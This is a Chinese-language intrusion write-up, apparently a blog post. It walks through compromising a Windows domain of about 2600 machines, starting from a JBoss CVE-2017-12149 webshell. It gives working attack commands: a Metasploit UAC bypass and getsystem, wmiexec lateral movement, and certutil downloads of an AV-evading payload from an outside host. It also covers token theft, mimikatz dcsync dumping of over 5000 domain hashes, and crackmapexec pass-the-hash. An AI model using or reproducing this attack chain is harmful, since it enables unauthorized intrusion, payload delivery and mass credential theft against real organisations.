如何打穿几千台机器的内网域渗透？当然是靠 WMI 横向移动了

                                                                  

前言

首先是发现了一个 CVE-2017-12149：

访问 http://inbug.org:9090/status 发现有日志，已经被上传了 webshell：

那么就用别人的把：http://inbug.org:9090/jexws4/jexws4.jsp?ppp=whoami

通过 powershell 上线到 Cs：

发现有几百个补丁提权无果：

                    

Metasploit 特权提权

随后把 CS 的 Beacon 互传到了 MSF：

MSF：

然后通过 MSF 的提权检测找到了几个 exp ：

run post/multi/recon/local_exploit_suggester

然后利用模块尝试提权：

exploit/windows/local/bypassuac_sdclt

发现用户身份没变，但是当前特权变了：

直接 getsystem 提权到 SYSTEM：

最后利用 SYSYEM 把 shell 传到 Cs：

MSF:

当前权限就可以抓密码了：

既然当前 beacon 不是 SYSYEM，而且有了本地管理员的账号hash和明文 ，直接本地 psexec 利用本地 administrator 的密码上线：

内网横向移动

这个时候发现就是一个 SYSTEM 的 Beacon 会话了！但是发现没有域管的进程，结果只能另寻他路！然后用抓到的密码去喷射域内其他主机：

然后可以横向 wmi：

 proxychains python3 wmiexec.py -shell-type cmd administrator:password@10.226.0.108 -codec gbk

Bypass 诺顿 AV 上线到 CobaltStrike

之后发现 10.226.0.156 有一个域管的进程：tasklist /v

然后还有诺顿 AV：

使用InScan 的ShllCode免杀功能 做了一下免杀

然后让目标下载我们的 exe，通过certutil 下载我们的 exe：

certutil.exe -urlcache -split -f http://inbug.org:80/download/main.exe

然后运行发现有问题：

exe 编码成 txt：

certutil -encode main.exe main.txt

然后目标下载 txt  然后解码再运行：

certutil.exe -urlcache -split -f http://inbug.org:80/download/main.txt

直接上线到 Cs：

先 getsystem 提权到 SYSYEM：

令牌窃取拿到域管

窃取域管的进程：

随后查询域控IP：

beacon> shell net group "Domain Controllers" /domain

最后直接 dcsync dump 域内全部 hash：

mimikatz lsadump::dcsync /domain:psnet.com /all /csv

5000 多个域用户的 hash 都拿到了，可以进行 pth，随后只要 administrator 的 hash，就可以指定：

mimikatz lsadump::dcsync /domain:inbug.org /user:Administrator

此时利用 ntlm hash 批量 pth 执行命令：

proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H 4a03985f63e4dxxxxxxx -d inbug.org -x "net user"

此时游戏已经结束了！查看了一下域内进行信息；

execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all

好家伙，2600多机器，5000多个用户，就到这吧。